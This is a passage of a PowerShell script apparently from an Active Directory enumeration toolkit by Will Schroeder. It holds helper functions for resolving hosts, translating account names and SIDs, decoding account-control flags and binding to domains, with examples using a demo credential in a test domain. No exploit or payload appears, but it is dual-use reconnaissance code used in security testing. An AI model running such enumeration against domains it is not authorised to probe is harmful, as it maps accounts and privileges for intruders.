[IO.Path]::GetFullPath($PSBoundParameters['Path'])\n        $Exists = [System.IO.File]::Exists($OutputPath)\n\n        # mutex so threaded code doesn't stomp on the output file\n        $Mutex = New-Object System.Threading.Mutex $False,'CSVMutex'\n        $Null = $Mutex.WaitOne()\n\n        if ($PSBoundParameters['Append']) {\n            $FileMode = [System.IO.FileMode]::Append\n        }\n        else {\n            $FileMode = [System.IO.FileMode]::Create\n            $Exists = $False\n        }\n\n        $CSVStream = New-Object IO.FileStream($OutputPath, $FileMode, [System.IO.FileAccess]::Write, [IO.FileShare]::Read)\n        $CSVWriter = New-Object System.IO.StreamWriter($CSVStream)\n        $CSVWriter.AutoFlush = $True\n    }\n\n    PROCESS {\n        ForEach ($Entry in $InputObject) {\n            $ObjectCSV = ConvertTo-Csv -InputObject $Entry -Delimiter $Delimiter -NoTypeInformation\n\n            if (-not $Exists) {\n                # output the object field names as well\n                $ObjectCSV | ForEach-Object { $CSVWriter.WriteLine($_) }\n                $Exists = $True\n            }\n            else {\n                # only output object field data\n                $ObjectCSV[1..($ObjectCSV.Length-1)] | ForEach-Object { $CSVWriter.WriteLine($_) }\n            }\n        }\n    }\n\n    END {\n        $Mutex.ReleaseMutex()\n        $CSVWriter.Dispose()\n        $CSVStream.Dispose()\n    }\n}\n\n\nfunction Resolve-IPAddress {\n<#\n.SYNOPSIS\n\nResolves a given hostename to its associated IPv4 address.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nResolves a given hostename to its associated IPv4 address using\n[Net.Dns]::GetHostEntry(). If no hostname is provided, the default\nis the IP address of the localhost.\n\n.EXAMPLE\n\nResolve-IPAddress -ComputerName SERVER\n\n.EXAMPLE\n\n@(\"SERVER1\", \"SERVER2\") | Resolve-IPAddress\n\n.INPUTS\n\nString\n\nAccepts one or more IP address strings on the pipeline.\n\n.OUTPUTS\n\nSystem.Management.Automation.PSCustomObject\n\nA custom PSObject with the ComputerName and IPAddress.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('System.Management.Automation.PSCustomObject')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = $Env:COMPUTERNAME\n    )\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            try {\n                @(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object {\n                    if ($_.AddressFamily -eq 'InterNetwork') {\n                        $Out = New-Object PSObject\n                        $Out | Add-Member Noteproperty 'ComputerName' $Computer\n                        $Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString\n                        $Out\n                    }\n                }\n            }\n            catch {\n                Write-Verbose \"[Resolve-IPAddress] Could not resolve $Computer to an IP Address.\"\n            }\n        }\n    }\n}\n\n\nfunction ConvertTo-SID {\n<#\n.SYNOPSIS\n\nConverts a given user/group name to a security identifier (SID).\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Convert-ADName, Get-DomainObject, Get-Domain  \n\n.DESCRIPTION\n\nConverts a \"DOMAIN\\username\" syntax to a security identifier (SID)\nusing System.Security.Principal.NTAccount's translate function. If alternate\ncredentials are supplied, then Get-ADObject is used to try to map the name\nto a security identifier.\n\n.PARAMETER ObjectName\n\nThe user/group name to convert, can be 'user' or 'DOMAIN\\user' format.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the translation, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to for the translation.\n\n.PARAMETER Credential\n\nSpecifies an alternate credential to use for the translation.\n\n.EXAMPLE\n\nConvertTo-SID 'DEV\\dfm'\n\n.EXAMPLE\n\n'DEV\\dfm','DEV\\krbtgt' | ConvertTo-SID\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\n'TESTLAB\\dfm' | ConvertTo-SID -Credential $Cred\n\n.INPUTS\n\nString\n\nAccepts one or more username specification strings on the pipeline.\n\n.OUTPUTS\n\nString\n\nA string representing the SID of the translated name.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([String])]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Name', 'Identity')]\n        [String[]]\n        $ObjectName,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $DomainSearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $DomainSearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $DomainSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['Credential']) { $DomainSearcherArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        ForEach ($Object in $ObjectName) {\n            $Object = $Object -Replace '/','\\'\n\n            if ($PSBoundParameters['Credential']) {\n                $DN = Convert-ADName -Identity $Object -OutputType 'DN' @DomainSearcherArguments\n                if ($DN) {\n                    $UserDomain = $DN.SubString($DN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                    $UserName = $DN.Split(',')[0].split('=')[1]\n\n                    $DomainSearcherArguments['Identity'] = $UserName\n                    $DomainSearcherArguments['Domain'] = $UserDomain\n                    $DomainSearcherArguments['Properties'] = 'objectsid'\n                    Get-DomainObject @DomainSearcherArguments | Select-Object -Expand objectsid\n                }\n            }\n            else {\n                try {\n                    if ($Object.Contains('\\')) {\n                        $Domain = $Object.Split('\\')[0]\n                        $Object = $Object.Split('\\')[1]\n                    }\n                    elseif (-not $PSBoundParameters['Domain']) {\n                        $DomainSearcherArguments = @{}\n                        $Domain = (Get-Domain @DomainSearcherArguments).Name\n                    }\n\n                    $Obj = (New-Object System.Security.Principal.NTAccount($Domain, $Object))\n                    $Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value\n                }\n                catch {\n                    Write-Verbose \"[ConvertTo-SID] Error converting $Domain\\$Object : $_\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction ConvertFrom-SID {\n<#\n.SYNOPSIS\n\nConverts a security identifier (SID) to a group/user name.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Convert-ADName  \n\n.DESCRIPTION\n\nConverts a security identifier string (SID) to a group/user name\nusing Convert-ADName.\n\n.PARAMETER ObjectSid\n\nSpecifies one or more SIDs to convert.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the translation, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to for the translation.\n\n.PARAMETER Credential\n\nSpecifies an alternate credential to use for the translation.\n\n.EXAMPLE\n\nConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108\n\nTESTLAB\\harmj0y\n\n.EXAMPLE\n\n\"S-1-5-21-890171859-3433809279-3366196753-1107\", \"S-1-5-21-890171859-3433809279-3366196753-1108\", \"S-1-5-32-562\" | ConvertFrom-SID\n\nTESTLAB\\WINDOWS2$\nTESTLAB\\harmj0y\nBUILTIN\\Distributed COM Users\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm', $SecPassword)\nConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred\n\nTESTLAB\\harmj0y\n\n.INPUTS\n\nString\n\nAccepts one or more SID strings on the pipeline.\n\n.OUTPUTS\n\nString\n\nThe converted DOMAIN\\username.\n#>\n\n    [OutputType([String])]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('SID')]\n        [ValidatePattern('^S-1-.*')]\n        [String[]]\n        $ObjectSid,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $ADNameArguments = @{}\n        if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }\n        if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        ForEach ($TargetSid in $ObjectSid) {\n            $TargetSid = $TargetSid.trim('*')\n            try {\n                # try to resolve any built-in SIDs first - https://support.microsoft.com/en-us/kb/243330\n                Switch ($TargetSid) {\n                    'S-1-0'         { 'Null Authority' }\n                    'S-1-0-0'       { 'Nobody' }\n                    'S-1-1'         { 'World Authority' }\n                    'S-1-1-0'       { 'Everyone' }\n                    'S-1-2'         { 'Local Authority' }\n                    'S-1-2-0'       { 'Local' }\n                    'S-1-2-1'       { 'Console Logon ' }\n                    'S-1-3'         { 'Creator Authority' }\n                    'S-1-3-0'       { 'Creator Owner' }\n                    'S-1-3-1'       { 'Creator Group' }\n                    'S-1-3-2'       { 'Creator Owner Server' }\n                    'S-1-3-3'       { 'Creator Group Server' }\n                    'S-1-3-4'       { 'Owner Rights' }\n                    'S-1-4'         { 'Non-unique Authority' }\n                    'S-1-5'         { 'NT Authority' }\n                    'S-1-5-1'       { 'Dialup' }\n                    'S-1-5-2'       { 'Network' }\n                    'S-1-5-3'       { 'Batch' }\n                    'S-1-5-4'       { 'Interactive' }\n                    'S-1-5-6'       { 'Service' }\n                    'S-1-5-7'       { 'Anonymous' }\n                    'S-1-5-8'       { 'Proxy' }\n                    'S-1-5-9'       { 'Enterprise Domain Controllers' }\n                    'S-1-5-10'      { 'Principal Self' }\n                    'S-1-5-11'      { 'Authenticated Users' }\n                    'S-1-5-12'      { 'Restricted Code' }\n                    'S-1-5-13'      { 'Terminal Server Users' }\n                    'S-1-5-14'      { 'Remote Interactive Logon' }\n                    'S-1-5-15'      { 'This Organization ' }\n                    'S-1-5-17'      { 'This Organization ' }\n                    'S-1-5-18'      { 'Local System' }\n                    'S-1-5-19'      { 'NT Authority' }\n                    'S-1-5-20'      { 'NT Authority' }\n                    'S-1-5-80-0'    { 'All Services ' }\n                    'S-1-5-32-544'  { 'BUILTIN\\Administrators' }\n                    'S-1-5-32-545'  { 'BUILTIN\\Users' }\n                    'S-1-5-32-546'  { 'BUILTIN\\Guests' }\n                    'S-1-5-32-547'  { 'BUILTIN\\Power Users' }\n                    'S-1-5-32-548'  { 'BUILTIN\\Account Operators' }\n                    'S-1-5-32-549'  { 'BUILTIN\\Server Operators' }\n                    'S-1-5-32-550'  { 'BUILTIN\\Print Operators' }\n                    'S-1-5-32-551'  { 'BUILTIN\\Backup Operators' }\n                    'S-1-5-32-552'  { 'BUILTIN\\Replicators' }\n                    'S-1-5-32-554'  { 'BUILTIN\\Pre-Windows 2000 Compatible Access' }\n                    'S-1-5-32-555'  { 'BUILTIN\\Remote Desktop Users' }\n                    'S-1-5-32-556'  { 'BUILTIN\\Network Configuration Operators' }\n                    'S-1-5-32-557'  { 'BUILTIN\\Incoming Forest Trust Builders' }\n                    'S-1-5-32-558'  { 'BUILTIN\\Performance Monitor Users' }\n                    'S-1-5-32-559'  { 'BUILTIN\\Performance Log Users' }\n                    'S-1-5-32-560'  { 'BUILTIN\\Windows Authorization Access Group' }\n                    'S-1-5-32-561'  { 'BUILTIN\\Terminal Server License Servers' }\n                    'S-1-5-32-562'  { 'BUILTIN\\Distributed COM Users' }\n                    'S-1-5-32-569'  { 'BUILTIN\\Cryptographic Operators' }\n                    'S-1-5-32-573'  { 'BUILTIN\\Event Log Readers' }\n                    'S-1-5-32-574'  { 'BUILTIN\\Certificate Service DCOM Access' }\n                    'S-1-5-32-575'  { 'BUILTIN\\RDS Remote Access Servers' }\n                    'S-1-5-32-576'  { 'BUILTIN\\RDS Endpoint Servers' }\n                    'S-1-5-32-577'  { 'BUILTIN\\RDS Management Servers' }\n                    'S-1-5-32-578'  { 'BUILTIN\\Hyper-V Administrators' }\n                    'S-1-5-32-579'  { 'BUILTIN\\Access Control Assistance Operators' }\n                    'S-1-5-32-580'  { 'BUILTIN\\Access Control Assistance Operators' }\n                    Default {\n                        Convert-ADName -Identity $TargetSid @ADNameArguments\n                    }\n                }\n            }\n            catch {\n                Write-Verbose \"[ConvertFrom-SID] Error converting SID '$TargetSid' : $_\"\n            }\n        }\n    }\n}\n\n\nfunction Convert-ADName {\n<#\n.SYNOPSIS\n\nConverts Active Directory object names between a variety of formats.\n\nAuthor: Bill Stewart, Pasquale Lantella  \nModifications: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nThis function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK)\nand translates Active Directory names between various formats using the NameTranslate COM object.\n\n.PARAMETER Identity\n\nSpecifies the Active Directory object name to translate, of the following form:\n\n    DN                short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'\n    Canonical         canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'\n    NT4               domain\\username; e.g., 'fabrikam\\pflynn'\n    Display           display name, e.g. 'pflynn'\n    DomainSimple      simple domain name format, e.g. 'pflynn@fabrikam.com'\n    EnterpriseSimple  simple enterprise name format, e.g. 'pflynn@fabrikam.com'\n    GUID              GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'\n    UPN               user principal name; e.g., 'pflynn@fabrikam.com'\n    CanonicalEx       extended canonical name format\n    SPN               service principal name format; e.g. 'HTTP/kairomac.contoso.com'\n    SID               Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999'\n\n.PARAMETER OutputType\n\nSpecifies the output name type you want to convert to, which must be one of the following:\n\n    DN                short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'\n    Canonical         canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'\n    NT4               domain\\username; e.g., 'fabrikam\\pflynn'\n    Display           display name, e.g. 'pflynn'\n    DomainSimple      simple domain name format, e.g. 'pflynn@fabrikam.com'\n    EnterpriseSimple  simple enterprise name format, e.g. 'pflynn@fabrikam.com'\n    GUID              GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'\n    UPN               user principal name; e.g., 'pflynn@fabrikam.com'\n    CanonicalEx       extended canonical name format, e.g. 'fabrikam.com/Users/Phineas Flynn'\n    SPN               service principal name format; e.g. 'HTTP/kairomac.contoso.com'\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the translation, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to for the translation.\n\n.PARAMETER Credential\n\nSpecifies an alternate credential to use for the translation.\n\n.EXAMPLE\n\nConvert-ADName -Identity \"TESTLAB\\harmj0y\"\n\nharmj0y@testlab.local\n\n.EXAMPLE\n\n\"TESTLAB\\krbtgt\", \"CN=Administrator,CN=Users,DC=testlab,DC=local\" | Convert-ADName -OutputType Canonical\n\ntestlab.local/Users/krbtgt\ntestlab.local/Users/Administrator\n\n.EXAMPLE\n\nConvert-ADName -OutputType dn -Identity 'TESTLAB\\harmj0y' -Server PRIMARY.testlab.local\n\nCN=harmj0y,CN=Users,DC=testlab,DC=local\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm', $SecPassword)\n'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred\n\nTESTLAB\\harmj0y\n\n.INPUTS\n\nString\n\nAccepts one or more objects name strings on the pipeline.\n\n.OUTPUTS\n\nString\n\nOutputs a string representing the converted name.\n\n.LINK\n\nhttp://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats\nhttps://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [OutputType([String])]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Name', 'ObjectName')]\n        [String[]]\n        $Identity,\n\n        [String]\n        [ValidateSet('DN', 'Canonical', 'NT4', 'Display', 'DomainSimple', 'EnterpriseSimple', 'GUID', 'Unknown', 'UPN', 'CanonicalEx', 'SPN')]\n        $OutputType,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $NameTypes = @{\n            'DN'                =   1  # CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com\n            'Canonical'         =   2  # fabrikam.com/Engineers/Phineas Flynn\n            'NT4'               =   3  # fabrikam\\pflynn\n            'Display'           =   4  # pflynn\n            'DomainSimple'      =   5  # pflynn@fabrikam.com\n            'EnterpriseSimple'  =   6  # pflynn@fabrikam.com\n            'GUID'              =   7  # {95ee9fff-3436-11d1-b2b0-d15ae3ac8436}\n            'Unknown'           =   8  # unknown type - let the server do translation\n            'UPN'               =   9  # pflynn@fabrikam.com\n            'CanonicalEx'       =   10 # fabrikam.com/Users/Phineas Flynn\n            'SPN'               =   11 # HTTP/kairomac.contoso.com\n            'SID'               =   12 # S-1-5-21-12986231-600641547-709122288-57999\n        }\n\n        # accessor functions from Bill Stewart to simplify calls to NameTranslate\n        function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) {\n            $Output = $Null\n            $Output = $Object.GetType().InvokeMember($Method, 'InvokeMethod', $NULL, $Object, $Parameters)\n            Write-Output $Output\n        }\n\n        function Get-Property([__ComObject] $Object, [String] $Property) {\n            $Object.GetType().InvokeMember($Property, 'GetProperty', $NULL, $Object, $NULL)\n        }\n\n        function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) {\n            [Void] $Object.GetType().InvokeMember($Property, 'SetProperty', $NULL, $Object, $Parameters)\n        }\n\n        # https://msdn.microsoft.com/en-us/library/aa772266%28v=vs.85%29.aspx\n        if ($PSBoundParameters['Server']) {\n            $ADSInitType = 2\n            $InitName = $Server\n        }\n        elseif ($PSBoundParameters['Domain']) {\n            $ADSInitType = 1\n            $InitName = $Domain\n        }\n        elseif ($PSBoundParameters['Credential']) {\n            $Cred = $Credential.GetNetworkCredential()\n            $ADSInitType = 1\n            $InitName = $Cred.Domain\n        }\n        else {\n            # if no domain or server is specified, default to GC initialization\n            $ADSInitType = 3\n            $InitName = $Null\n        }\n    }\n\n    PROCESS {\n        ForEach ($TargetIdentity in $Identity) {\n            if (-not $PSBoundParameters['OutputType']) {\n                if ($TargetIdentity -match \"^[A-Za-z]+\\\\[A-Za-z ]+\") {\n                    $ADSOutputType = $NameTypes['DomainSimple']\n                }\n                else {\n                    $ADSOutputType = $NameTypes['NT4']\n                }\n            }\n            else {\n                $ADSOutputType = $NameTypes[$OutputType]\n            }\n\n            $Translate = New-Object -ComObject NameTranslate\n\n            if ($PSBoundParameters['Credential']) {\n                try {\n                    $Cred = $Credential.GetNetworkCredential()\n\n                    Invoke-Method $Translate 'InitEx' (\n                        $ADSInitType,\n                        $InitName,\n                        $Cred.UserName,\n                        $Cred.Domain,\n                        $Cred.Password\n                    )\n                }\n                catch {\n                    Write-Verbose \"[Convert-ADName] Error initializing translation for '$Identity' using alternate credentials : $_\"\n                }\n            }\n            else {\n                try {\n                    $Null = Invoke-Method $Translate 'Init' (\n                        $ADSInitType,\n                        $InitName\n                    )\n                }\n                catch {\n                    Write-Verbose \"[Convert-ADName] Error initializing translation for '$Identity' : $_\"\n                }\n            }\n\n            # always chase all referrals\n            Set-Property $Translate 'ChaseReferral' (0x60)\n\n            try {\n                # 8 = Unknown name type -> let the server do the work for us\n                $Null = Invoke-Method $Translate 'Set' (8, $TargetIdentity)\n                Invoke-Method $Translate 'Get' ($ADSOutputType)\n            }\n            catch [System.Management.Automation.MethodInvocationException] {\n                Write-Verbose \"[Convert-ADName] Error translating '$TargetIdentity' : $($_.Exception.InnerException.Message)\"\n            }\n        }\n    }\n}\n\n\nfunction ConvertFrom-UACValue {\n<#\n.SYNOPSIS\n\nConverts a UAC int value to human readable form.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nThis function will take an integer that represents a User Account\nControl (UAC) binary blob and will covert it to an ordered\ndictionary with each bitwise value broken out. By default only values\nset are displayed- the -ShowAll switch will display all values with\na + next to the ones set.\n\n.PARAMETER Value\n\nSpecifies the integer UAC value to convert.\n\n.PARAMETER ShowAll\n\nSwitch. Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set.\n\n.EXAMPLE\n\nConvertFrom-UACValue -Value 66176\n\nName                           Value\n----                           -----\nENCRYPTED_TEXT_PWD_ALLOWED     128\nNORMAL_ACCOUNT                 512\nDONT_EXPIRE_PASSWORD           65536\n\n.EXAMPLE\n\nGet-DomainUser harmj0y | ConvertFrom-UACValue\n\nName                           Value\n----                           -----\nNORMAL_ACCOUNT                 512\nDONT_EXPIRE_PASSWORD           65536\n\n.EXAMPLE\n\nGet-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll\n\nName                           Value\n----                           -----\nSCRIPT                         1\nACCOUNTDISABLE                 2\nHOMEDIR_REQUIRED               8\nLOCKOUT                        16\nPASSWD_NOTREQD                 32\nPASSWD_CANT_CHANGE             64\nENCRYPTED_TEXT_PWD_ALLOWED     128\nTEMP_DUPLICATE_ACCOUNT         256\nNORMAL_ACCOUNT                 512+\nINTERDOMAIN_TRUST_ACCOUNT      2048\nWORKSTATION_TRUST_ACCOUNT      4096\nSERVER_TRUST_ACCOUNT           8192\nDONT_EXPIRE_PASSWORD           65536+\nMNS_LOGON_ACCOUNT              131072\nSMARTCARD_REQUIRED             262144\nTRUSTED_FOR_DELEGATION         524288\nNOT_DELEGATED                  1048576\nUSE_DES_KEY_ONLY               2097152\nDONT_REQ_PREAUTH               4194304\nPASSWORD_EXPIRED               8388608\nTRUSTED_TO_AUTH_FOR_DELEGATION 16777216\nPARTIAL_SECRETS_ACCOUNT        67108864\n\n.INPUTS\n\nInt\n\nAccepts an integer representing a UAC binary blob.\n\n.OUTPUTS\n\nSystem.Collections.Specialized.OrderedDictionary\n\nAn ordered dictionary with the converted UAC fields.\n\n.LINK\n\nhttps://support.microsoft.com/en-us/kb/305144\n#>\n\n    [OutputType('System.Collections.Specialized.OrderedDictionary')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('UAC', 'useraccountcontrol')]\n        [Int]\n        $Value,\n\n        [Switch]\n        $ShowAll\n    )\n\n    BEGIN {\n        # values from https://support.microsoft.com/en-us/kb/305144\n        $UACValues = New-Object System.Collections.Specialized.OrderedDictionary\n        $UACValues.Add(\"SCRIPT\", 1)\n        $UACValues.Add(\"ACCOUNTDISABLE\", 2)\n        $UACValues.Add(\"HOMEDIR_REQUIRED\", 8)\n        $UACValues.Add(\"LOCKOUT\", 16)\n        $UACValues.Add(\"PASSWD_NOTREQD\", 32)\n        $UACValues.Add(\"PASSWD_CANT_CHANGE\", 64)\n        $UACValues.Add(\"ENCRYPTED_TEXT_PWD_ALLOWED\", 128)\n        $UACValues.Add(\"TEMP_DUPLICATE_ACCOUNT\", 256)\n        $UACValues.Add(\"NORMAL_ACCOUNT\", 512)\n        $UACValues.Add(\"INTERDOMAIN_TRUST_ACCOUNT\", 2048)\n        $UACValues.Add(\"WORKSTATION_TRUST_ACCOUNT\", 4096)\n        $UACValues.Add(\"SERVER_TRUST_ACCOUNT\", 8192)\n        $UACValues.Add(\"DONT_EXPIRE_PASSWORD\", 65536)\n        $UACValues.Add(\"MNS_LOGON_ACCOUNT\", 131072)\n        $UACValues.Add(\"SMARTCARD_REQUIRED\", 262144)\n        $UACValues.Add(\"TRUSTED_FOR_DELEGATION\", 524288)\n        $UACValues.Add(\"NOT_DELEGATED\", 1048576)\n        $UACValues.Add(\"USE_DES_KEY_ONLY\", 2097152)\n        $UACValues.Add(\"DONT_REQ_PREAUTH\", 4194304)\n        $UACValues.Add(\"PASSWORD_EXPIRED\", 8388608)\n        $UACValues.Add(\"TRUSTED_TO_AUTH_FOR_DELEGATION\", 16777216)\n        $UACValues.Add(\"PARTIAL_SECRETS_ACCOUNT\", 67108864)\n    }\n\n    PROCESS {\n        $ResultUACValues = New-Object System.Collections.Specialized.OrderedDictionary\n\n        if ($ShowAll) {\n            ForEach ($UACValue in $UACValues.GetEnumerator()) {\n                if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) {\n                    $ResultUACValues.Add($UACValue.Name, \"$($UACValue.Value)+\")\n                }\n                else {\n                    $ResultUACValues.Add($UACValue.Name, \"$($UACValue.Value)\")\n                }\n            }\n        }\n        else {\n            ForEach ($UACValue in $UACValues.GetEnumerator()) {\n                if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) {\n                    $ResultUACValues.Add($UACValue.Name, \"$($UACValue.Value)\")\n                }\n            }\n        }\n        $ResultUACValues\n    }\n}\n\n\nfunction Get-PrincipalContext {\n<#\n.SYNOPSIS\n\nHelper to take an Identity and return a DirectoryServices.AccountManagement.PrincipalContext\nand simplified identity.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.PARAMETER Identity\n\nA group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202),\nor a DOMAIN\\username identity.\n\n.PARAMETER Domain\n\nSpecifies the domain to use to search for user/group principals, defaults to the current domain.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True)]\n        [Alias('GroupName', 'GroupIdentity')]\n        [String]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    Add-Type -AssemblyName System.DirectoryServices.AccountManagement\n\n    try {\n        if ($PSBoundParameters['Domain'] -or ($Identity -match '.+\\\\.+')) {\n            if ($Identity -match '.+\\\\.+') {\n                # DOMAIN\\groupname\n                $ConvertedIdentity = $Identity | Convert-ADName -OutputType Canonical\n                if ($ConvertedIdentity) {\n                    $ConnectTarget = $ConvertedIdentity.SubString(0, $ConvertedIdentity.IndexOf('/'))\n                    $ObjectIdentity = $Identity.Split('\\')[1]\n                    Write-Verbose \"[Get-PrincipalContext] Binding to domain '$ConnectTarget'\"\n                }\n            }\n            else {\n                $ObjectIdentity = $Identity\n                Write-Verbose \"[Get-PrincipalContext] Binding to domain '$Domain'\"\n                $ConnectTarget = $Domain\n            }\n\n            if ($PSBoundParameters['Credential']) {\n                Write-Verbose '[Get-PrincipalContext] Using alternate credentials'\n                $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget, $Credential.UserName, $Credential.GetNetworkCredential().Password)\n            }\n            else {\n                $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget)\n            }\n        }\n        else {\n            if ($PSBoundParameters['Credential']) {\n                Write-Verbose '[Get-PrincipalContext] Using alternate credentials'\n                $DomainName = Get-Domain | Select-Object -ExpandProperty Name\n                $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $DomainName, $Credential.UserName, $Credential.GetNetworkCredential().Password)\n            }\n            else {\n                $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)\n            }\n            $ObjectIdentity = $Identity\n        }\n\n        $Out = New-Object PSObject\n        $Out | Add-Member Noteproperty 'Context' $Context\n        $Out | Add-Member Noteproperty 'Identity' $ObjectIdentity\n        $Out\n    }\n    catch {\n        Write-Warning \"[Get-PrincipalContext] Error creating binding for object ('$Identity') context : $_\"\n    }\n}\n\n\nfunction Add-RemoteConnection {\n<#\n.SYNOPSIS\n\nPseudo \"mounts\" a connection to a remote path using the specified\ncredential object, allowing for access of remote resources. If a -Path 